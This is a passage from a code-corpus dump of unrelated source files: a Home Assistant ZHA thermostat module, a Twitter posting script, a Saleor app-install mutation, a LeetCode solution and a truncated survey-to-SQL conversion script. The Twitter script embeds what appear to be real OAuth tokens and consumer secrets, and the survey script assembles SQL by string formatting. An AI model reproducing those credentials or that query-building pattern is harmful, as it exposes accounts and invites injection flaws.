T.SystemMode.Pre_cooling: HVACMode.COOL, # this is 'precooling'. is it the same?
T.SystemMode.Fan_only: HVACMode.FAN_ONLY,
T.SystemMode.Dry: HVACMode.DRY,
T.SystemMode.Sleep: HVACMode.OFF,
}
ZCL_TEMP = 100
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Zigbee Home Automation sensor from config entry."""
entities_to_create = hass.data[DATA_ZHA][Platform.CLIMATE]
unsub = async_dispatcher_connect(
hass,
SIGNAL_ADD_ENTITIES,
functools.partial(
discovery.async_add_entities, async_add_entities, entities_to_create
),
)
config_entry.async_on_unload(unsub)
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
aux_cluster_handlers=CLUSTER_HANDLER_FAN,
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class Thermostat(ZhaEntity, ClimateEntity):
"""Representation of a ZHA Thermostat device."""
DEFAULT_MAX_TEMP = 35
DEFAULT_MIN_TEMP = 7
_attr_precision = PRECISION_TENTHS
_attr_temperature_unit = UnitOfTemperature.CELSIUS
_attr_name: str = "Thermostat"
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._thrm = self.cluster_handlers.get(CLUSTER_HANDLER_THERMOSTAT)
self._preset = PRESET_NONE
self._presets = []
self._supported_flags = ClimateEntityFeature.TARGET_TEMPERATURE
self._fan = self.cluster_handlers.get(CLUSTER_HANDLER_FAN)
@property
def current_temperature(self):
"""Return the current temperature."""
if self._thrm.local_temperature is None:
return None
return self._thrm.local_temperature / ZCL_TEMP
@property
def extra_state_attributes(self):
"""Return device specific state attributes."""
data = {}
if self.hvac_mode:
mode = SYSTEM_MODE_2_HVAC.get(self._thrm.system_mode, "unknown")
data[ATTR_SYS_MODE] = f"[{self._thrm.system_mode}]/{mode}"
if self._thrm.occupancy is not None:
data[ATTR_OCCUPANCY] = self._thrm.occupancy
if self._thrm.occupied_cooling_setpoint is not None:
data[ATTR_OCCP_COOL_SETPT] = self._thrm.occupied_cooling_setpoint
if self._thrm.occupied_heating_setpoint is not None:
data[ATTR_OCCP_HEAT_SETPT] = self._thrm.occupied_heating_setpoint
if self._thrm.pi_heating_demand is not None:
data[ATTR_PI_HEATING_DEMAND] = self._thrm.pi_heating_demand
if self._thrm.pi_cooling_demand is not None:
data[ATTR_PI_COOLING_DEMAND] = self._thrm.pi_cooling_demand
unoccupied_cooling_setpoint = self._thrm.unoccupied_cooling_setpoint
if unoccupied_cooling_setpoint is not None:
data[ATTR_UNOCCP_COOL_SETPT] = unoccupied_cooling_setpoint
unoccupied_heating_setpoint = self._thrm.unoccupied_heating_setpoint
if unoccupied_heating_setpoint is not None:
data[ATTR_UNOCCP_HEAT_SETPT] = unoccupied_heating_setpoint
return data
@property
def fan_mode(self) -> str | None:
"""Return current FAN mode."""
if self._thrm.running_state is None:
return FAN_AUTO
if self._thrm.running_state & (
T.RunningState.Fan_State_On
| T.RunningState.Fan_2nd_Stage_On
| T.RunningState.Fan_3rd_Stage_On
):
return FAN_ON
return FAN_AUTO
@property
def fan_modes(self) -> list[str] | None:
"""Return supported FAN modes."""
if not self._fan:
return None
return [FAN_AUTO, FAN_ON]
@property
def hvac_action(self) -> HVACAction | None:
"""Return the current HVAC action."""
if (
self._thrm.pi_heating_demand is None
and self._thrm.pi_cooling_demand is None
):
return self._rm_rs_action
return self._pi_demand_action
@property
def _rm_rs_action(self) -> HVACAction | None:
"""Return the current HVAC action based on running mode and running state."""
if (running_state := self._thrm.running_state) is None:
return None
if running_state & (
T.RunningState.Heat_State_On | T.RunningState.Heat_2nd_Stage_On
):
return HVACAction.HEATING
if running_state & (
T.RunningState.Cool_State_On | T.RunningState.Cool_2nd_Stage_On
):
return HVACAction.COOLING
if running_state & (
T.RunningState.Fan_State_On
| T.RunningState.Fan_2nd_Stage_On
| T.RunningState.Fan_3rd_Stage_On
):
return HVACAction.FAN
if running_state & T.RunningState.Idle:
return HVACAction.IDLE
if self.hvac_mode != HVACMode.OFF:
return HVACAction.IDLE
return HVACAction.OFF
@property
def _pi_demand_action(self) -> HVACAction | None:
"""Return the current HVAC action based on pi_demands."""
heating_demand = self._thrm.pi_heating_demand
if heating_demand is not None and heating_demand > 0:
return HVACAction.HEATING
cooling_demand = self._thrm.pi_cooling_demand
if cooling_demand is not None and cooling_demand > 0:
return HVACAction.COOLING
if self.hvac_mode != HVACMode.OFF:
return HVACAction.IDLE
return HVACAction.OFF
@property
def hvac_mode(self) -> HVACMode | None:
"""Return HVAC operation mode."""
return SYSTEM_MODE_2_HVAC.get(self._thrm.system_mode)
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return the list of available HVAC operation modes."""
return SEQ_OF_OPERATION.get(self._thrm.ctrl_sequence_of_oper, [HVACMode.OFF])
@property
def preset_mode(self) -> str:
"""Return current preset mode."""
return self._preset
@property
def preset_modes(self) -> list[str] | None:
"""Return supported preset modes."""
return self._presets
@property
def supported_features(self) -> ClimateEntityFeature:
"""Return the list of supported features."""
features = self._supported_flags
if HVACMode.HEAT_COOL in self.hvac_modes:
features |= ClimateEntityFeature.TARGET_TEMPERATURE_RANGE
if self._fan is not None:
self._supported_flags |= ClimateEntityFeature.FAN_MODE
return features
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
temp = None
if self.hvac_mode == HVACMode.COOL:
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_cooling_setpoint
else:
temp = self._thrm.occupied_cooling_setpoint
elif self.hvac_mode == HVACMode.HEAT:
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_heating_setpoint
else:
temp = self._thrm.occupied_heating_setpoint
if temp is None:
return temp
return round(temp / ZCL_TEMP, 1)
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if self.hvac_mode != HVACMode.HEAT_COOL:
return None
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_cooling_setpoint
else:
temp = self._thrm.occupied_cooling_setpoint
if temp is None:
return temp
return round(temp / ZCL_TEMP, 1)
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if self.hvac_mode != HVACMode.HEAT_COOL:
return None
if self.preset_mode == PRESET_AWAY:
temp = self._thrm.unoccupied_heating_setpoint
else:
temp = self._thrm.occupied_heating_setpoint
if temp is None:
return temp
return round(temp / ZCL_TEMP, 1)
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
temps = []
if HVACMode.HEAT in self.hvac_modes:
temps.append(self._thrm.max_heat_setpoint_limit)
if HVACMode.COOL in self.hvac_modes:
temps.append(self._thrm.max_cool_setpoint_limit)
if not temps:
return self.DEFAULT_MAX_TEMP
return round(max(temps) / ZCL_TEMP, 1)
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
temps = []
if HVACMode.HEAT in self.hvac_modes:
temps.append(self._thrm.min_heat_setpoint_limit)
if HVACMode.COOL in self.hvac_modes:
temps.append(self._thrm.min_cool_setpoint_limit)
if not temps:
return self.DEFAULT_MIN_TEMP
return round(min(temps) / ZCL_TEMP, 1)
async def async_added_to_hass(self) -> None:
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._thrm, SIGNAL_ATTR_UPDATED, self.async_attribute_updated
)
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if (
record.attr_name in (ATTR_OCCP_COOL_SETPT, ATTR_OCCP_HEAT_SETPT)
and self.preset_mode == PRESET_AWAY
):
# occupancy attribute is an unreportable attribute, but if we get
# an attribute update for an "occupied" setpoint, there's a chance
# occupancy has changed
if await self._thrm.get_occupancy() is True:
self._preset = PRESET_NONE
self.debug("Attribute '%s' = %s update", record.attr_name, record.value)
self.async_write_ha_state()
async def async_set_fan_mode(self, fan_mode: str) -> None:
"""Set fan mode."""
if not self.fan_modes or fan_mode not in self.fan_modes:
self.warning("Unsupported '%s' fan mode", fan_mode)
return
if fan_mode == FAN_ON:
mode = F.FanMode.On
else:
mode = F.FanMode.Auto
await self._fan.async_set_speed(mode)
async def async_set_hvac_mode(self, hvac_mode: HVACMode) -> None:
"""Set new target operation mode."""
if hvac_mode not in self.hvac_modes:
self.warning(
"can't set '%s' mode. Supported modes are: %s",
hvac_mode,
self.hvac_modes,
)
return
if await self._thrm.async_set_operation_mode(HVAC_MODE_2_SYSTEM[hvac_mode]):
self.async_write_ha_state()
async def async_set_preset_mode(self, preset_mode: str) -> None:
"""Set new preset mode."""
if not self.preset_modes or preset_mode not in self.preset_modes:
self.debug("Preset mode '%s' is not supported", preset_mode)
return
if self.preset_mode not in (
preset_mode,
PRESET_NONE,
) and not await self.async_preset_handler(self.preset_mode, enable=False):
self.debug("Couldn't turn off '%s' preset", self.preset_mode)
return
if preset_mode != PRESET_NONE and not await self.async_preset_handler(
preset_mode, enable=True
):
self.debug("Couldn't turn on '%s' preset", preset_mode)
return
self._preset = preset_mode
self.async_write_ha_state()
async def async_set_temperature(self, **kwargs: Any) -> None:
"""Set new target temperature."""
low_temp = kwargs.get(ATTR_TARGET_TEMP_LOW)
high_temp = kwargs.get(ATTR_TARGET_TEMP_HIGH)
temp = kwargs.get(ATTR_TEMPERATURE)
hvac_mode = kwargs.get(ATTR_HVAC_MODE)
if hvac_mode is not None:
await self.async_set_hvac_mode(hvac_mode)
thrm = self._thrm
if self.hvac_mode == HVACMode.HEAT_COOL:
success = True
if low_temp is not None:
low_temp = int(low_temp * ZCL_TEMP)
success = success and await thrm.async_set_heating_setpoint(
low_temp, self.preset_mode == PRESET_AWAY
)
self.debug("Setting heating %s setpoint: %s", low_temp, success)
if high_temp is not None:
high_temp = int(high_temp * ZCL_TEMP)
success = success and await thrm.async_set_cooling_setpoint(
high_temp, self.preset_mode == PRESET_AWAY
)
self.debug("Setting cooling %s setpoint: %s", low_temp, success)
elif temp is not None:
temp = int(temp * ZCL_TEMP)
if self.hvac_mode == HVACMode.COOL:
success = await thrm.async_set_cooling_setpoint(
temp, self.preset_mode == PRESET_AWAY
)
elif self.hvac_mode == HVACMode.HEAT:
success = await thrm.async_set_heating_setpoint(
temp, self.preset_mode == PRESET_AWAY
)
else:
self.debug("Not setting temperature for '%s' mode", self.hvac_mode)
return
else:
self.debug("incorrect %s setting for '%s' mode", kwargs, self.hvac_mode)
return
if success:
self.async_write_ha_state()
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode via handler."""
handler = getattr(self, f"async_preset_handler_{preset}")
return await handler(enable)
@MULTI_MATCH(
cluster_handler_names={CLUSTER_HANDLER_THERMOSTAT, "sinope_manufacturer_specific"},
manufacturers="Sinope Technologies",
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class SinopeTechnologiesThermostat(Thermostat):
"""Sinope Technologies Thermostat."""
manufacturer = 0x119C
update_time_interval = timedelta(minutes=randint(45, 75))
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [PRESET_AWAY, PRESET_NONE]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
self._manufacturer_ch = self.cluster_handlers["sinope_manufacturer_specific"]
@property
def _rm_rs_action(self) -> HVACAction:
"""Return the current HVAC action based on running mode and running state."""
running_mode = self._thrm.running_mode
if running_mode == T.SystemMode.Heat:
return HVACAction.HEATING
if running_mode == T.SystemMode.Cool:
return HVACAction.COOLING
running_state = self._thrm.running_state
if running_state and running_state & (
T.RunningState.Fan_State_On
| T.RunningState.Fan_2nd_Stage_On
| T.RunningState.Fan_3rd_Stage_On
):
return HVACAction.FAN
if self.hvac_mode != HVACMode.OFF and running_mode == T.SystemMode.Off:
return HVACAction.IDLE
return HVACAction.OFF
@callback
def _async_update_time(self, timestamp=None) -> None:
"""Update thermostat's time display."""
secs_2k = (
dt_util.now().replace(tzinfo=None) - datetime(2000, 1, 1, 0, 0, 0, 0)
).total_seconds()
self.debug("Updating time: %s", secs_2k)
self._manufacturer_ch.cluster.create_catching_task(
self._manufacturer_ch.cluster.write_attributes(
{"secs_since_2k": secs_2k}, manufacturer=self.manufacturer
)
)
async def async_added_to_hass(self) -> None:
"""Run when about to be added to Hass."""
await super().async_added_to_hass()
self.async_on_remove(
async_track_time_interval(
self.hass, self._async_update_time, self.update_time_interval
)
)
self._async_update_time()
async def async_preset_handler_away(self, is_away: bool = False) -> bool:
"""Set occupancy."""
mfg_code = self._zha_device.manufacturer_code
res = await self._thrm.write_attributes(
{"set_occupancy": 0 if is_away else 1}, manufacturer=mfg_code
)
self.debug("set occupancy to %s. Status: %s", 0 if is_away else 1, res)
return res
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
aux_cluster_handlers=CLUSTER_HANDLER_FAN,
manufacturers={"Zen Within", "LUX"},
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class ZenWithinThermostat(Thermostat):
"""Zen Within Thermostat implementation."""
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
aux_cluster_handlers=CLUSTER_HANDLER_FAN,
manufacturers="Centralite",
models={"3157100", "3157100-E"},
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class CentralitePearl(ZenWithinThermostat):
"""Centralite Pearl Thermostat implementation."""
@STRICT_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers={
"_TZE200_ckud7u2l",
"_TZE200_ywdxldoj",
"_TZE200_cwnjrr72",
"_TZE200_2atgpdho",
"_TZE200_pvvbommb",
"_TZE200_4eeyebrt",
"_TZE200_cpmgn2cf",
"_TZE200_9sfg7gm0",
"_TZE200_8whxpsiw",
"_TYST11_ckud7u2l",
"_TYST11_ywdxldoj",
"_TYST11_cwnjrr72",
"_TYST11_2atgpdho",
},
)
class MoesThermostat(Thermostat):
"""Moes Thermostat implementation."""
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [
PRESET_NONE,
PRESET_AWAY,
PRESET_SCHEDULE,
PRESET_COMFORT,
PRESET_ECO,
PRESET_BOOST,
PRESET_COMPLEX,
]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return only the heat mode, because the device can't be turned off."""
return [HVACMode.HEAT]
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if record.attr_name == "operation_preset":
if record.value == 0:
self._preset = PRESET_AWAY
if record.value == 1:
self._preset = PRESET_SCHEDULE
if record.value == 2:
self._preset = PRESET_NONE
if record.value == 3:
self._preset = PRESET_COMFORT
if record.value == 4:
self._preset = PRESET_ECO
if record.value == 5:
self._preset = PRESET_BOOST
if record.value == 6:
self._preset = PRESET_COMPLEX
await super().async_attribute_updated(record)
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode."""
mfg_code = self._zha_device.manufacturer_code
if not enable:
return await self._thrm.write_attributes(
{"operation_preset": 2}, manufacturer=mfg_code
)
if preset == PRESET_AWAY:
return await self._thrm.write_attributes(
{"operation_preset": 0}, manufacturer=mfg_code
)
if preset == PRESET_SCHEDULE:
return await self._thrm.write_attributes(
{"operation_preset": 1}, manufacturer=mfg_code
)
if preset == PRESET_COMFORT:
return await self._thrm.write_attributes(
{"operation_preset": 3}, manufacturer=mfg_code
)
if preset == PRESET_ECO:
return await self._thrm.write_attributes(
{"operation_preset": 4}, manufacturer=mfg_code
)
if preset == PRESET_BOOST:
return await self._thrm.write_attributes(
{"operation_preset": 5}, manufacturer=mfg_code
)
if preset == PRESET_COMPLEX:
return await self._thrm.write_attributes(
{"operation_preset": 6}, manufacturer=mfg_code
)
return False
@STRICT_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers={
"_TZE200_b6wax7g0",
},
)
class BecaThermostat(Thermostat):
"""Beca Thermostat implementation."""
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [
PRESET_NONE,
PRESET_AWAY,
PRESET_SCHEDULE,
PRESET_ECO,
PRESET_BOOST,
PRESET_TEMP_MANUAL,
]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return only the heat mode, because the device can't be turned off."""
return [HVACMode.HEAT]
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if record.attr_name == "operation_preset":
if record.value == 0:
self._preset = PRESET_AWAY
if record.value == 1:
self._preset = PRESET_SCHEDULE
if record.value == 2:
self._preset = PRESET_NONE
if record.value == 4:
self._preset = PRESET_ECO
if record.value == 5:
self._preset = PRESET_BOOST
if record.value == 7:
self._preset = PRESET_TEMP_MANUAL
await super().async_attribute_updated(record)
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode."""
mfg_code = self._zha_device.manufacturer_code
if not enable:
return await self._thrm.write_attributes(
{"operation_preset": 2}, manufacturer=mfg_code
)
if preset == PRESET_AWAY:
return await self._thrm.write_attributes(
{"operation_preset": 0}, manufacturer=mfg_code
)
if preset == PRESET_SCHEDULE:
return await self._thrm.write_attributes(
{"operation_preset": 1}, manufacturer=mfg_code
)
if preset == PRESET_ECO:
return await self._thrm.write_attributes(
{"operation_preset": 4}, manufacturer=mfg_code
)
if preset == PRESET_BOOST:
return await self._thrm.write_attributes(
{"operation_preset": 5}, manufacturer=mfg_code
)
if preset == PRESET_TEMP_MANUAL:
return await self._thrm.write_attributes(
{"operation_preset": 7}, manufacturer=mfg_code
)
return False
@MULTI_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers="Stelpro",
models={"SORB"},
stop_on_match_group=CLUSTER_HANDLER_THERMOSTAT,
)
class StelproFanHeater(Thermostat):
"""Stelpro Fan Heater implementation."""
@property
def hvac_modes(self) -> list[HVACMode]:
"""Return only the heat mode, because the device can't be turned off."""
return [HVACMode.HEAT]
@STRICT_MATCH(
cluster_handler_names=CLUSTER_HANDLER_THERMOSTAT,
manufacturers={
"_TZE200_7yoranx2",
"_TZE200_e9ba97vf", # TV01-ZG
"_TZE200_hue3yfsn", # TV02-ZG
"_TZE200_husqqvux", # TSL-TRV-TV01ZG
"_TZE200_kds0pmmv", # MOES TRV TV02
"_TZE200_kly8gjlz", # TV05-ZG
"_TZE200_lnbfnyxd",
"_TZE200_mudxchsu",
},
)
class ZONNSMARTThermostat(Thermostat):
"""ZONNSMART Thermostat implementation.
Notice that this device uses two holiday presets (2: HolidayMode,
3: HolidayModeTemp), but only one of them can be set.
"""
PRESET_HOLIDAY = "holiday"
PRESET_FROST = "frost protect"
def __init__(self, unique_id, zha_device, cluster_handlers, **kwargs):
"""Initialize ZHA Thermostat instance."""
super().__init__(unique_id, zha_device, cluster_handlers, **kwargs)
self._presets = [
PRESET_NONE,
self.PRESET_HOLIDAY,
PRESET_SCHEDULE,
self.PRESET_FROST,
]
self._supported_flags |= ClimateEntityFeature.PRESET_MODE
async def async_attribute_updated(self, record):
"""Handle attribute update from device."""
if record.attr_name == "operation_preset":
if record.value == 0:
self._preset = PRESET_SCHEDULE
if record.value == 1:
self._preset = PRESET_NONE
if record.value == 2:
self._preset = self.PRESET_HOLIDAY
if record.value == 3:
self._preset = self.PRESET_HOLIDAY
if record.value == 4:
self._preset = self.PRESET_FROST
await super().async_attribute_updated(record)
async def async_preset_handler(self, preset: str, enable: bool = False) -> bool:
"""Set the preset mode."""
mfg_code = self._zha_device.manufacturer_code
if not enable:
return await self._thrm.write_attributes(
{"operation_preset": 1}, manufacturer=mfg_code
)
if preset == PRESET_SCHEDULE:
return await self._thrm.write_attributes(
{"operation_preset": 0}, manufacturer=mfg_code
)
if preset == self.PRESET_HOLIDAY:
return await self._thrm.write_attributes(
{"operation_preset": 3}, manufacturer=mfg_code
)
if preset == self.PRESET_FROST:
return await self._thrm.write_attributes(
{"operation_preset": 4}, manufacturer=mfg_code
)
return False
| [
"[email protected]"
] | |
e191dcd55943188856e0aa6d20abcb3ae22cd4d2 | c5698844e4c5cd6428d25f5a97a2f4ad069df251 | /twitter/publicar desde python/read.py | a394d4c896e493b5d9f689dc1751a7b77d468356 | [] | no_license | jrartd/Python-tools | 1ade026dcc9b3987bb7a6af130403895a8456d3c | 361031a2d108e048d267bf386a8a703359a81321 | refs/heads/master | 2022-12-21T23:38:53.038535 | 2018-02-09T18:18:10 | 2018-02-09T18:18:10 | 114,409,529 | 0 | 1 | null | 2022-12-12T09:18:07 | 2017-12-15T20:41:15 | HTML | UTF-8 | Python | false | false | 458 | py | from twitter import *
access_token = "712533602102284288-QGxqYcFiQlGZGTaoNIgHgq2KZxqZeeH"
access_token_secret = "rlH5ItRHtlguzChQbIvLDo1yYCu47liEtq8fdVgeOZpb9"
consumer_key = "VWe4b0p7vRcVS06gbJyS83dIS"
consumer_secret = "PjkoSJ4YxPXo4V9Uk7bazq4y507e6zBr96q7u2OlJeP1aVZd7w"
texto_tweet = input("Enter the text to tweet")
t = Twitter(auth=OAuth(access_token, access_token_secret, consumer_key, consumer_secret))
t.statuses.update(status=texto_tweet)
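# Note: with this `twitter` package, the positional order above is
# OAuth(token, token_secret, consumer_key, consumer_secret); if posting fails,
# check that the four hardcoded strings are passed in exactly that order.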
| [
"[email protected]"
] | |
a1590dd5a7d854d633c6cc4a59cd757b06b26e95 | 84c4474a88a59da1e72d86b33b5326003f578271 | /saleor/graphql/app/mutations/app_retry_install.py | 64faee9ee45caa39c2e77961854e66c1815f20c1 | [
"BSD-3-Clause"
] | permissive | vineetb/saleor | 052bd416d067699db774f06453d942cb36c5a4b7 | b0d5ec1a55f2ceeba6f62cf15f53faea0adf93f9 | refs/heads/main | 2023-07-20T02:01:28.338748 | 2023-07-17T06:05:36 | 2023-07-17T06:05:36 | 309,911,573 | 0 | 0 | NOASSERTION | 2020-11-04T06:32:55 | 2020-11-04T06:32:55 | null | UTF-8 | Python | false | false | 2,274 | py | import graphene
from django.core.exceptions import ValidationError
from ....app import models
from ....app.error_codes import AppErrorCode
from ....app.tasks import install_app_task
from ....core import JobStatus
from ....permission.enums import AppPermission
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.mutations import ModelMutation
from ...core.types import AppError
from ...core.utils import WebhookEventInfo
from ..types import AppInstallation
class AppRetryInstall(ModelMutation):
class Arguments:
id = graphene.ID(description="ID of failed installation.", required=True)
activate_after_installation = graphene.Boolean(
default_value=True,
required=False,
description="Determine if app will be set active or not.",
)
class Meta:
description = "Retry failed installation of new app."
model = models.AppInstallation
object_type = AppInstallation
permissions = (AppPermission.MANAGE_APPS,)
error_type_class = AppError
error_type_field = "app_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.APP_INSTALLED,
description="An app was installed.",
),
]
@classmethod
def save(cls, _info: ResolveInfo, instance, _cleaned_input, /):
instance.status = JobStatus.PENDING
instance.save()
@classmethod
def clean_instance(cls, _info: ResolveInfo, instance):
if instance.status != JobStatus.FAILED:
msg = "Cannot retry installation with different status than failed."
code = AppErrorCode.INVALID_STATUS.value
raise ValidationError({"id": ValidationError(msg, code=code)})
@classmethod
def perform_mutation(cls, _root, info: ResolveInfo, /, **data):
activate_after_installation = data.get("activate_after_installation")
app_installation = cls.get_instance(info, **data)
cls.clean_instance(info, app_installation)
cls.save(info, app_installation, None)
install_app_task.delay(app_installation.pk, activate_after_installation)
return cls.success_response(app_installation)
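# Illustrative GraphQL invocation of this mutation (a sketch only: field names
# are derived from the Arguments/Meta above by Saleor's camelCase convention,
# and the ID value is hypothetical):
#
#   mutation {
#     appRetryInstall(id: "QXBwSW5zdGFsbGF0aW9uOjE=", activateAfterInstallation: true) {
#       appInstallation { id status }
#       appErrors { field code }
#     }
#   }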
| [
"[email protected]"
] | |
0573b6563ad45c09808049f4fdd2f87ff082fce9 | ba157236151a65e3e1fde2db78b0c7db81b5d3f6 | /String/longest_group_positions.py | f01ef3284224992f2d915fed2ff79a7296bfda75 | [] | no_license | JaberKhanjk/LeetCode | 152488ccf385b449d2a97d20b33728483029f85b | 78368ea4c8dd8efc92e3db775b249a2f8758dd55 | refs/heads/master | 2023-02-08T20:03:34.704602 | 2020-12-26T06:24:33 | 2020-12-26T06:24:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | class Solution(object):
    def largeGroupPositions(self, s):
        """
        :type s: str
        :rtype: List[List[int]]
        """
        ans = []
        i = 0  # start of the current run of equal characters
        for j in range(len(s)):
            # close the run at the last character or where s[j] != s[j+1]
            if j == len(s) - 1 or s[j] != s[j+1]:
                if j - i + 1 >= 3:
                    ans.append([i, j])
                i = j + 1
        return ans
| [
"[email protected]"
] | |
ed83b8b9465e7789fbdf5342d12e6863ef98a36d | ab79ca83f97aff1f5e00d46781e0355b8e26b4c7 | /LogTranslation/SurveyMode.py | 32758c98925e9a4ab2306d4f3422dfbebcbe5061 | [] | no_license | AngusGLChen/LearningTransfer | d966ece2b94b3287f7cf0468ae7afd9591c64d99 | 956c9a9e557deb959b26ae42fb46eba38fb417dd | refs/heads/master | 2021-01-19T06:42:47.967713 | 2016-06-20T19:18:09 | 2016-06-20T19:18:09 | 61,573,656 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 12,461 | py | '''
Created on Jul 27, 2015
@author: Angus
'''
import os, re
def survey_mode(path):
files = os.listdir(path)
course_id = ""
id_map = {}
response_id_set = set()
# Output survey_description table
survey_description_path = os.path.dirname(os.path.dirname(os.path.dirname(path))) + "/Results/FP101x/" + "survey_description.sql"
if os.path.isfile(survey_description_path):
os.remove(survey_description_path)
survey_description_file = open(survey_description_path, 'wb')
survey_description_file.write("\r\n" + "USE FP101x;" + "\r\n")
survey_description_file.write("\r\n" + "DROP TABLE IF EXISTS survey_description; CREATE TABLE survey_description (question_id varchar(255) NOT NULL, course_id varchar(255), question_type varchar(255), description text, PRIMARY KEY (question_id), FOREIGN KEY (course_id) REFERENCES courses(course_id)) ENGINE=MyISAM;" + "\r\n")
# Output survey_response table
survey_response_path = os.path.dirname(os.path.dirname(os.path.dirname(path))) + "/Results/FP101x/" + "survey_response.sql"
if os.path.isfile(survey_response_path):
os.remove(survey_response_path)
survey_response_file = open(survey_response_path, 'wb')
survey_response_file.write("\r\n" + "USE FP101x;" + "\r\n")
survey_response_file.write("\r\n" + "DROP TABLE IF EXISTS survey_response; CREATE TABLE survey_response (response_id varchar(255) NOT NULL, course_user_id varchar(255), question_id varchar(255), answer text, PRIMARY KEY (response_id), FOREIGN KEY (course_user_id) REFERENCES global_user(course_user_id)) ENGINE=MyISAM;" + "\r\n")
# Processing course_structure data
for file in files:
if "course_structure" in file:
# To extract course_id
course_id_array = file.split("-")
course_id = course_id_array[0] + "/" + course_id_array[1] + "/" + course_id_array[2]
# Processing ID information
for file in files:
if "2014T3_FP101x" in file:
sub_path = path + file + "/"
sub_files = os.listdir(sub_path)
for sub_file in sub_files:
if "FP Course Data" in sub_file:
id_path = sub_path + sub_file + "/"
id_files = os.listdir(id_path)
for id_file in id_files:
if "-anon-ids" in id_file:
fp = open(id_path + id_file, "r")
fp.readline()
lines = fp.readlines()
for line in lines:
array = line.split(",")
global_id = array[0].replace("\"","")
anonymized_id = array[1].replace("\"","")
id_map[anonymized_id] = global_id
# Processing Pre-survey information
for file in files:
if "2014T3_FP101x" in file:
sub_path = path + file + "/"
sub_files = os.listdir(sub_path)
for sub_file in sub_files:
if "FP Pre Survey" in sub_file:
pre_path = sub_path + sub_file + "/"
pre_files = os.listdir(pre_path)
for pre_file in pre_files:
if "survey_updated" in pre_file:
fp = open(pre_path + pre_file, "r")
# To process question_id line
question_id_line = fp.readline()
question_id_array = question_id_line.split(",")
# To process question description line
question_line = fp.readline()
question_line = question_line.replace("\",NA,\"","\",\"NA\",\"")
question_array = question_line.split("\",\"")
                            for i in range(23,98):  # pre-survey question columns in the CSV export
question_id = course_id + "_pre_" + question_id_array[i].replace("\"","")
question_array[i] = question_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_description (question_id, course_id, question_type, description) values"
write_string += "('%s','%s','%s','%s');\r\n" % (question_id, course_id, "pre", question_array[i])
survey_description_file.write(write_string)
response_lines = fp.readlines()
num_multipleID = 0
for response_line in response_lines:
response_line = response_line.replace("\",NA,\"","\",\"NA\",\"")
subRegex = re.compile("\(([^\(\)]*)\)")
matches = subRegex.findall(response_line)
if not len(matches) == 0:
for match in matches:
response_line = response_line.replace(match, "")
response_array = response_line.split("\",\"")
# print response_array[103]
if response_array[103] in id_map.keys():
course_user_id = course_id + "_" + id_map[response_array[103]]
for i in range(23,98):
question_id = course_id + "_" + "pre" + "_" + question_id_array[i].replace("\"","")
response_id = course_user_id + "_" + "pre" + "_" + question_id_array[i].replace("\"","")
if response_id not in response_id_set:
response_array[i] = response_array[i].replace("\'", "\\'")
write_string = "\r\n" + "insert into survey_response (response_id, course_user_id, question_id, answer) values"
write_string += "('%s','%s','%s','%s');\r\n" % (response_id, course_user_id, question_id, response_array[i])
survey_response_file.write(write_string)
response_id_set.add(response_id)
# else:
# print response_id + "\t" + response_array[103] + "\t" + question_array[i]
else:
num_multipleID += 1
# print response_line
print "Pre - The number of response is: " + str(len(response_lines))
print "Pre - The number of response with multiple/empty IDs is: " + str(num_multipleID)
print ""
# Processing Post-survey information
for file in files:
if "2014T3_FP101x" in file:
sub_path = path + file + "/"
sub_files = os.listdir(sub_path)
